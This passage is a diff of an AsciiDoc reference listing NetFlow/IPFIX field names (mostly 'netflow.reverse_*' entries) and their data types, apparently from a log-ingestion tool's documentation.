++ +-- +type: float + +-- + +*`netflow.procera_rat`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_remote_ipv4_host`*:: ++ +-- +type: ip + +-- + +*`netflow.procera_remote_ipv6_host`*:: ++ +-- +type: ip + +-- + +*`netflow.procera_rnc`*:: ++ +-- +type: integer + +-- + +*`netflow.procera_server_hostname`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_service`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_sgsn`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_subscriber_identifier`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_template_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.procera_user_location_information`*:: ++ +-- +type: keyword + +-- + +*`netflow.protocol_identifier`*:: ++ +-- +type: short + +-- + +*`netflow.pseudo_wire_control_word`*:: ++ +-- +type: long + +-- + +*`netflow.pseudo_wire_destination_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.pseudo_wire_id`*:: ++ +-- +type: long + +-- + +*`netflow.pseudo_wire_type`*:: ++ +-- +type: integer + +-- + +*`netflow.reason`*:: ++ +-- +type: long + +-- + +*`netflow.reason_text`*:: ++ +-- +type: keyword + +-- + +*`netflow.relative_error`*:: ++ +-- +type: double + +-- + +*`netflow.responder_octets`*:: ++ +-- +type: long + +-- + +*`netflow.responder_packets`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_absolute_error`*:: ++ +-- +type: double + +-- + +*`netflow.reverse_anonymization_flags`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_anonymization_technique`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_application_category_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_application_description`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_application_group_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_application_id`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_application_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_application_sub_category_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_average_interarrival_time`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_bgp_destination_as_number`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_bgp_next_adjacent_as_number`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_bgp_next_hop_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.reverse_bgp_next_hop_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.reverse_bgp_prev_adjacent_as_number`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_bgp_source_as_number`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_bgp_validity_state`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_class_id`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_class_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_classification_engine_id`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_collection_time_milliseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_collector_certificate`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_confidence_level`*:: ++ +-- +type: double + +-- + +*`netflow.reverse_connection_sum_duration_seconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_connection_transaction_id`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_data_byte_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_data_link_frame_section`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_data_link_frame_size`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_data_link_frame_type`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_data_records_reliability`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_delta_flow_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_destination_ipv4_address`*:: ++ +-- +type: ip + +-- + +*`netflow.reverse_destination_ipv4_prefix`*:: ++ +-- +type: ip + +-- + +*`netflow.reverse_destination_ipv4_prefix_length`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_destination_ipv6_address`*:: ++ +-- +type: ip + +-- + +*`netflow.reverse_destination_ipv6_prefix`*:: ++ +-- +type: ip + +-- + +*`netflow.reverse_destination_ipv6_prefix_length`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_destination_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_destination_transport_port`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_digest_hash_value`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_distinct_count_of_destination_ip_address`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_distinct_count_of_destination_ipv4_address`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_distinct_count_of_destination_ipv6_address`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_distinct_count_of_source_ip_address`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_distinct_count_of_source_ipv4_address`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_distinct_count_of_source_ipv6_address`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dot1q_customer_dei`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_dot1q_customer_destination_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_dot1q_customer_priority`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_dot1q_customer_source_mac_address`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_dot1q_customer_vlan_id`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_dot1q_dei`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_dot1q_priority`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_dot1q_service_instance_id`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dot1q_service_instance_priority`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_dot1q_service_instance_tag`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_dot1q_vlan_id`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_dropped_layer2_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dropped_layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dropped_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dropped_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dropped_packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dropped_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_dst_traffic_index`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_egress_broadcast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_egress_interface`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_egress_interface_type`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_egress_physical_interface`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_egress_unicast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_egress_vrfid`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_encrypted_technology`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_engine_id`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_engine_type`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_ethernet_header_length`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_ethernet_payload_length`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_ethernet_total_length`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_ethernet_type`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_export_sctp_stream_id`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_exporter_certificate`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_exporting_process_id`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_firewall_event`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_first_non_empty_packet_size`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_first_packet_banner`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_flags_and_sampler_id`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_active_timeout`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_flow_attributes`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_flow_delta_milliseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_direction`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_flow_duration_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_duration_milliseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_end_delta_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_end_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_end_milliseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_end_nanoseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_end_reason`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_flow_end_seconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_end_sys_up_time`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_idle_timeout`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_flow_label_ipv6`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_sampling_time_interval`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_sampling_time_spacing`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_selected_flow_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_selected_octet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_selected_packet_delta_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_selector_algorithm`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_flow_start_delta_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_start_microseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_start_milliseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_start_nanoseconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_start_seconds`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_flow_start_sys_up_time`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_forwarding_status`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_fragment_flags`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_fragment_identification`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_fragment_offset`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_gre_key`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_hash_digest_output`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_hash_flow_domain`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_hash_initialiser_value`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_hash_ip_payload_offset`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_hash_ip_payload_size`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_hash_output_range_max`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_hash_output_range_min`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_hash_selected_range_max`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_hash_selected_range_min`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_icmp_code_ipv4`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_icmp_code_ipv6`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_icmp_type_code_ipv4`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_icmp_type_code_ipv6`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_icmp_type_ipv4`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_icmp_type_ipv6`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_igmp_type`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_ignored_data_record_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_ignored_layer2_frame_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_ignored_layer2_octet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_information_element_data_type`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_information_element_description`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_information_element_id`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_information_element_index`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_information_element_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_information_element_range_begin`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_information_element_range_end`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_information_element_semantics`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_information_element_units`*:: ++ +-- +type: integer + +-- + +*`netflow.reverse_ingress_broadcast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_ingress_interface`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_ingress_interface_type`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_ingress_multicast_packet_total_count`*:: + -- -type: keyword +type: long -- -*`netflow.post_ip_diff_serv_code_point`*:: +*`netflow.reverse_ingress_physical_interface`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_ingress_unicast_packet_total_count`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_ingress_vrfid`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_initial_tcp_flags`*:: + -- type: short -- -*`netflow.multicast_replication_factor`*:: +*`netflow.reverse_initiator_octets`*:: + -- type: long -- -*`netflow.class_name`*:: +*`netflow.reverse_initiator_packets`*:: ++ +-- +type: long + +-- + +*`netflow.reverse_interface_description`*:: + -- type: keyword -- -*`netflow.classification_engine_id`*:: +*`netflow.reverse_interface_name`*:: + -- -type: short +type: keyword -- -*`netflow.layer2packet_section_offset`*:: +*`netflow.reverse_intermediate_process_id`*:: + -- -type: integer +type: long -- -*`netflow.layer2packet_section_size`*:: +*`netflow.reverse_ip_class_of_service`*:: + -- -type: integer +type: short -- -*`netflow.layer2packet_section_data`*:: +*`netflow.reverse_ip_diff_serv_code_point`*:: + -- type: short -- -*`netflow.bgp_next_adjacent_as_number`*:: +*`netflow.reverse_ip_header_length`*:: + -- -type: long +type: short -- -*`netflow.bgp_prev_adjacent_as_number`*:: +*`netflow.reverse_ip_header_packet_section`*:: + -- -type: long +type: keyword -- -*`netflow.exporter_ipv4_address`*:: +*`netflow.reverse_ip_next_hop_ipv4_address`*:: + -- type: ip -- -*`netflow.exporter_ipv6_address`*:: +*`netflow.reverse_ip_next_hop_ipv6_address`*:: + -- type: ip -- -*`netflow.dropped_octet_delta_count`*:: +*`netflow.reverse_ip_payload_length`*:: + -- type: long -- -*`netflow.dropped_packet_delta_count`*:: +*`netflow.reverse_ip_payload_packet_section`*:: + -- -type: long +type: keyword -- -*`netflow.dropped_octet_total_count`*:: +*`netflow.reverse_ip_precedence`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_ip_sec_spi`*:: + -- type: long -- -*`netflow.dropped_packet_total_count`*:: +*`netflow.reverse_ip_total_length`*:: + -- type: long -- -*`netflow.flow_end_reason`*:: +*`netflow.reverse_ip_ttl`*:: + -- type: short -- -*`netflow.common_properties_id`*:: +*`netflow.reverse_ip_version`*:: + -- -type: long +type: short -- -*`netflow.observation_point_id`*:: +*`netflow.reverse_ipv4_ihl`*:: + -- -type: long +type: short -- -*`netflow.icmp_type_code_ipv6`*:: +*`netflow.reverse_ipv4_options`*:: + -- -type: integer +type: long -- -*`netflow.mpls_top_label_ipv6_address`*:: +*`netflow.reverse_ipv4_router_sc`*:: + -- type: ip -- -*`netflow.line_card_id`*:: +*`netflow.reverse_ipv6_extension_headers`*:: + -- type: long -- -*`netflow.port_id`*:: +*`netflow.reverse_is_multicast`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_large_packet_count`*:: + -- type: long -- -*`netflow.metering_process_id`*:: +*`netflow.reverse_layer2_frame_delta_count`*:: + -- type: long -- -*`netflow.exporting_process_id`*:: +*`netflow.reverse_layer2_frame_total_count`*:: + -- type: long -- -*`netflow.template_id`*:: +*`netflow.reverse_layer2_octet_delta_count`*:: + -- -type: integer +type: long -- -*`netflow.wlan_channel_id`*:: +*`netflow.reverse_layer2_octet_delta_sum_of_squares`*:: + -- -type: short +type: long -- -*`netflow.wlan_ssid`*:: +*`netflow.reverse_layer2_octet_total_count`*:: + -- -type: keyword +type: long -- -*`netflow.flow_id`*:: +*`netflow.reverse_layer2_octet_total_sum_of_squares`*:: + -- type: long -- -*`netflow.observation_domain_id`*:: +*`netflow.reverse_layer2_segment_id`*:: + -- type: long -- -*`netflow.flow_start_seconds`*:: +*`netflow.reverse_layer2packet_section_data`*:: + -- -type: date +type: keyword -- -*`netflow.flow_end_seconds`*:: +*`netflow.reverse_layer2packet_section_offset`*:: + -- -type: date +type: integer -- -*`netflow.flow_start_milliseconds`*:: +*`netflow.reverse_layer2packet_section_size`*:: + -- -type: date +type: integer -- -*`netflow.flow_end_milliseconds`*:: +*`netflow.reverse_line_card_id`*:: + -- -type: date +type: long -- -*`netflow.flow_start_microseconds`*:: +*`netflow.reverse_lower_ci_limit`*:: + -- -type: date +type: double -- -*`netflow.flow_end_microseconds`*:: +*`netflow.reverse_max_export_seconds`*:: + -- -type: date +type: long -- -*`netflow.flow_start_nanoseconds`*:: +*`netflow.reverse_max_flow_end_microseconds`*:: + -- -type: date +type: long -- -*`netflow.flow_end_nanoseconds`*:: +*`netflow.reverse_max_flow_end_milliseconds`*:: + -- -type: date +type: long -- -*`netflow.flow_start_delta_microseconds`*:: +*`netflow.reverse_max_flow_end_nanoseconds`*:: + -- type: long -- -*`netflow.flow_end_delta_microseconds`*:: +*`netflow.reverse_max_flow_end_seconds`*:: + -- type: long -- -*`netflow.system_init_time_milliseconds`*:: +*`netflow.reverse_max_packet_size`*:: + -- -type: date +type: integer -- -*`netflow.flow_duration_milliseconds`*:: +*`netflow.reverse_maximum_ip_total_length`*:: + -- type: long -- -*`netflow.flow_duration_microseconds`*:: +*`netflow.reverse_maximum_layer2_total_length`*:: + -- type: long -- -*`netflow.observed_flow_total_count`*:: +*`netflow.reverse_maximum_ttl`*:: + -- -type: long +type: short -- -*`netflow.ignored_packet_total_count`*:: +*`netflow.reverse_message_md5_checksum`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_message_scope`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_metering_process_id`*:: + -- type: long -- -*`netflow.ignored_octet_total_count`*:: +*`netflow.reverse_metro_evc_id`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_metro_evc_type`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_min_export_seconds`*:: + -- type: long -- -*`netflow.not_sent_flow_total_count`*:: +*`netflow.reverse_min_flow_start_microseconds`*:: + -- type: long -- -*`netflow.not_sent_packet_total_count`*:: +*`netflow.reverse_min_flow_start_milliseconds`*:: + -- type: long -- -*`netflow.not_sent_octet_total_count`*:: +*`netflow.reverse_min_flow_start_nanoseconds`*:: + -- type: long -- -*`netflow.destination_ipv6_prefix`*:: +*`netflow.reverse_min_flow_start_seconds`*:: + -- -type: ip +type: long -- -*`netflow.source_ipv6_prefix`*:: +*`netflow.reverse_minimum_ip_total_length`*:: + -- -type: ip +type: long -- -*`netflow.post_octet_total_count`*:: +*`netflow.reverse_minimum_layer2_total_length`*:: + -- type: long -- -*`netflow.post_packet_total_count`*:: +*`netflow.reverse_minimum_ttl`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_monitoring_interval_end_milli_seconds`*:: + -- type: long -- -*`netflow.flow_key_indicator`*:: +*`netflow.reverse_monitoring_interval_start_milli_seconds`*:: + -- type: long -- -*`netflow.post_mcast_packet_total_count`*:: +*`netflow.reverse_mpls_label_stack_depth`*:: + -- type: long -- -*`netflow.post_mcast_octet_total_count`*:: +*`netflow.reverse_mpls_label_stack_length`*:: + -- type: long -- -*`netflow.icmp_type_ipv4`*:: +*`netflow.reverse_mpls_label_stack_section`*:: + -- -type: short +type: keyword -- -*`netflow.icmp_code_ipv4`*:: +*`netflow.reverse_mpls_label_stack_section10`*:: + -- -type: short +type: keyword -- -*`netflow.icmp_type_ipv6`*:: +*`netflow.reverse_mpls_label_stack_section2`*:: + -- -type: short +type: keyword -- -*`netflow.icmp_code_ipv6`*:: +*`netflow.reverse_mpls_label_stack_section3`*:: + -- -type: short +type: keyword -- -*`netflow.udp_source_port`*:: +*`netflow.reverse_mpls_label_stack_section4`*:: + -- -type: integer +type: keyword -- -*`netflow.udp_destination_port`*:: +*`netflow.reverse_mpls_label_stack_section5`*:: + -- -type: integer +type: keyword -- -*`netflow.tcp_source_port`*:: +*`netflow.reverse_mpls_label_stack_section6`*:: + -- -type: integer +type: keyword -- -*`netflow.tcp_destination_port`*:: +*`netflow.reverse_mpls_label_stack_section7`*:: + -- -type: integer +type: keyword -- -*`netflow.tcp_sequence_number`*:: +*`netflow.reverse_mpls_label_stack_section8`*:: + -- -type: long +type: keyword -- -*`netflow.tcp_acknowledgement_number`*:: +*`netflow.reverse_mpls_label_stack_section9`*:: + -- -type: long +type: keyword -- -*`netflow.tcp_window_size`*:: +*`netflow.reverse_mpls_payload_length`*:: + -- -type: integer +type: long -- -*`netflow.tcp_urgent_pointer`*:: +*`netflow.reverse_mpls_payload_packet_section`*:: + -- -type: integer +type: keyword -- -*`netflow.tcp_header_length`*:: +*`netflow.reverse_mpls_top_label_exp`*:: + -- type: short -- -*`netflow.ip_header_length`*:: +*`netflow.reverse_mpls_top_label_ipv4_address`*:: + -- -type: short +type: ip -- -*`netflow.total_length_ipv4`*:: +*`netflow.reverse_mpls_top_label_ipv6_address`*:: + -- -type: integer +type: ip -- -*`netflow.payload_length_ipv6`*:: +*`netflow.reverse_mpls_top_label_prefix_length`*:: + -- -type: integer +type: short -- -*`netflow.ip_ttl`*:: +*`netflow.reverse_mpls_top_label_stack_section`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_mpls_top_label_ttl`*:: + -- type: short -- -*`netflow.next_header_ipv6`*:: +*`netflow.reverse_mpls_top_label_type`*:: + -- type: short -- -*`netflow.mpls_payload_length`*:: +*`netflow.reverse_mpls_vpn_route_distinguisher`*:: + -- -type: long +type: keyword -- -*`netflow.ip_diff_serv_code_point`*:: +*`netflow.reverse_multicast_replication_factor`*:: + -- -type: short +type: long -- -*`netflow.ip_precedence`*:: +*`netflow.reverse_nat_event`*:: + -- type: short -- -*`netflow.fragment_flags`*:: +*`netflow.reverse_nat_originating_address_realm`*:: + -- type: short -- -*`netflow.octet_delta_sum_of_squares`*:: +*`netflow.reverse_nat_pool_id`*:: + -- type: long -- -*`netflow.octet_total_sum_of_squares`*:: +*`netflow.reverse_nat_pool_name`*:: + -- -type: long +type: keyword -- -*`netflow.mpls_top_label_ttl`*:: +*`netflow.reverse_nat_type`*:: + -- type: short -- -*`netflow.mpls_label_stack_length`*:: +*`netflow.reverse_new_connection_delta_count`*:: + -- type: long -- -*`netflow.mpls_label_stack_depth`*:: +*`netflow.reverse_next_header_ipv6`*:: + -- -type: long +type: short -- -*`netflow.mpls_top_label_exp`*:: +*`netflow.reverse_non_empty_packet_count`*:: + -- -type: short +type: long -- -*`netflow.ip_payload_length`*:: +*`netflow.reverse_not_sent_layer2_octet_total_count`*:: + -- type: long -- -*`netflow.udp_message_length`*:: +*`netflow.reverse_observation_domain_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_observation_point_id`*:: + -- -type: integer +type: long -- -*`netflow.is_multicast`*:: +*`netflow.reverse_observation_point_type`*:: + -- type: short -- -*`netflow.ipv4_ihl`*:: +*`netflow.reverse_observation_time_microseconds`*:: + -- -type: short +type: long -- -*`netflow.ipv4_options`*:: +*`netflow.reverse_observation_time_milliseconds`*:: + -- type: long -- -*`netflow.tcp_options`*:: +*`netflow.reverse_observation_time_nanoseconds`*:: + -- type: long -- -*`netflow.padding_octets`*:: +*`netflow.reverse_observation_time_seconds`*:: + -- -type: short +type: long -- -*`netflow.collector_ipv4_address`*:: +*`netflow.reverse_octet_delta_count`*:: + -- -type: ip +type: long -- -*`netflow.collector_ipv6_address`*:: +*`netflow.reverse_octet_delta_sum_of_squares`*:: + -- -type: ip +type: long -- -*`netflow.export_interface`*:: +*`netflow.reverse_octet_total_count`*:: + -- type: long -- -*`netflow.export_protocol_version`*:: +*`netflow.reverse_octet_total_sum_of_squares`*:: + -- -type: short +type: long -- -*`netflow.export_transport_protocol`*:: +*`netflow.reverse_opaque_octets`*:: + -- -type: short +type: keyword -- -*`netflow.collector_transport_port`*:: +*`netflow.reverse_original_exporter_ipv4_address`*:: + -- -type: integer +type: ip -- -*`netflow.exporter_transport_port`*:: +*`netflow.reverse_original_exporter_ipv6_address`*:: + -- -type: integer +type: ip -- -*`netflow.tcp_syn_total_count`*:: +*`netflow.reverse_original_flows_completed`*:: + -- type: long -- -*`netflow.tcp_fin_total_count`*:: +*`netflow.reverse_original_flows_initiated`*:: + -- type: long -- -*`netflow.tcp_rst_total_count`*:: +*`netflow.reverse_original_flows_present`*:: + -- type: long -- -*`netflow.tcp_psh_total_count`*:: +*`netflow.reverse_original_observation_domain_id`*:: + -- type: long -- -*`netflow.tcp_ack_total_count`*:: +*`netflow.reverse_os_finger_print`*:: + -- -type: long +type: keyword -- -*`netflow.tcp_urg_total_count`*:: +*`netflow.reverse_os_name`*:: + -- -type: long +type: keyword -- -*`netflow.ip_total_length`*:: +*`netflow.reverse_os_version`*:: + -- -type: long +type: keyword -- -*`netflow.post_nat_source_ipv4_address`*:: +*`netflow.reverse_p2p_technology`*:: + -- -type: ip +type: keyword -- -*`netflow.post_nat_destination_ipv4_address`*:: +*`netflow.reverse_packet_delta_count`*:: + -- -type: ip +type: long -- -*`netflow.post_napt_source_transport_port`*:: +*`netflow.reverse_packet_total_count`*:: + -- -type: integer +type: long -- -*`netflow.post_napt_destination_transport_port`*:: +*`netflow.reverse_payload`*:: + -- -type: integer +type: keyword -- -*`netflow.nat_originating_address_realm`*:: +*`netflow.reverse_payload_entropy`*:: + -- type: short -- -*`netflow.nat_event`*:: +*`netflow.reverse_payload_length_ipv6`*:: + -- -type: short +type: integer -- -*`netflow.initiator_octets`*:: +*`netflow.reverse_port_id`*:: + -- type: long -- -*`netflow.responder_octets`*:: +*`netflow.reverse_port_range_end`*:: + -- -type: long +type: integer -- -*`netflow.firewall_event`*:: +*`netflow.reverse_port_range_num_ports`*:: + -- -type: short +type: integer -- -*`netflow.ingress_vrfid`*:: +*`netflow.reverse_port_range_start`*:: + -- -type: long +type: integer -- -*`netflow.egress_vrfid`*:: +*`netflow.reverse_port_range_step_size`*:: + -- -type: long +type: integer -- -*`netflow.vr_fname`*:: +*`netflow.reverse_post_destination_mac_address`*:: + -- type: keyword -- -*`netflow.post_mpls_top_label_exp`*:: +*`netflow.reverse_post_dot1q_customer_vlan_id`*:: + -- -type: short +type: integer -- -*`netflow.tcp_window_scale`*:: +*`netflow.reverse_post_dot1q_vlan_id`*:: + -- type: integer -- -*`netflow.biflow_direction`*:: +*`netflow.reverse_post_ip_class_of_service`*:: + -- type: short -- -*`netflow.ethernet_header_length`*:: +*`netflow.reverse_post_ip_diff_serv_code_point`*:: + -- type: short -- -*`netflow.ethernet_payload_length`*:: +*`netflow.reverse_post_ip_precedence`*:: + -- -type: integer +type: short -- -*`netflow.ethernet_total_length`*:: +*`netflow.reverse_post_layer2_octet_delta_count`*:: + -- -type: integer +type: long -- -*`netflow.dot1q_vlan_id`*:: +*`netflow.reverse_post_layer2_octet_total_count`*:: + -- -type: integer +type: long -- -*`netflow.dot1q_priority`*:: +*`netflow.reverse_post_mcast_layer2_octet_delta_count`*:: + -- -type: short +type: long -- -*`netflow.dot1q_customer_vlan_id`*:: +*`netflow.reverse_post_mcast_layer2_octet_total_count`*:: + -- -type: integer +type: long -- -*`netflow.dot1q_customer_priority`*:: +*`netflow.reverse_post_mcast_octet_delta_count`*:: + -- -type: short +type: long -- -*`netflow.metro_evc_id`*:: +*`netflow.reverse_post_mcast_octet_total_count`*:: + -- -type: keyword +type: long -- -*`netflow.metro_evc_type`*:: +*`netflow.reverse_post_mcast_packet_delta_count`*:: + -- -type: short +type: long -- -*`netflow.pseudo_wire_id`*:: +*`netflow.reverse_post_mcast_packet_total_count`*:: + -- type: long -- -*`netflow.pseudo_wire_type`*:: +*`netflow.reverse_post_mpls_top_label_exp`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_post_napt_destination_transport_port`*:: + -- type: integer -- -*`netflow.pseudo_wire_control_word`*:: +*`netflow.reverse_post_napt_source_transport_port`*:: + -- -type: long +type: integer -- -*`netflow.ingress_physical_interface`*:: +*`netflow.reverse_post_nat_destination_ipv4_address`*:: + -- -type: long +type: ip -- -*`netflow.egress_physical_interface`*:: +*`netflow.reverse_post_nat_destination_ipv6_address`*:: + -- -type: long +type: ip -- -*`netflow.post_dot1q_vlan_id`*:: +*`netflow.reverse_post_nat_source_ipv4_address`*:: + -- -type: integer +type: ip -- -*`netflow.post_dot1q_customer_vlan_id`*:: +*`netflow.reverse_post_nat_source_ipv6_address`*:: + -- -type: integer +type: ip -- -*`netflow.ethernet_type`*:: +*`netflow.reverse_post_octet_delta_count`*:: + -- -type: integer +type: long -- -*`netflow.post_ip_precedence`*:: +*`netflow.reverse_post_octet_total_count`*:: + -- -type: short +type: long -- -*`netflow.collection_time_milliseconds`*:: +*`netflow.reverse_post_packet_delta_count`*:: + -- -type: date +type: long -- -*`netflow.export_sctp_stream_id`*:: +*`netflow.reverse_post_packet_total_count`*:: + -- -type: integer +type: long -- -*`netflow.max_export_seconds`*:: +*`netflow.reverse_post_source_mac_address`*:: + -- -type: date +type: keyword -- -*`netflow.max_flow_end_seconds`*:: 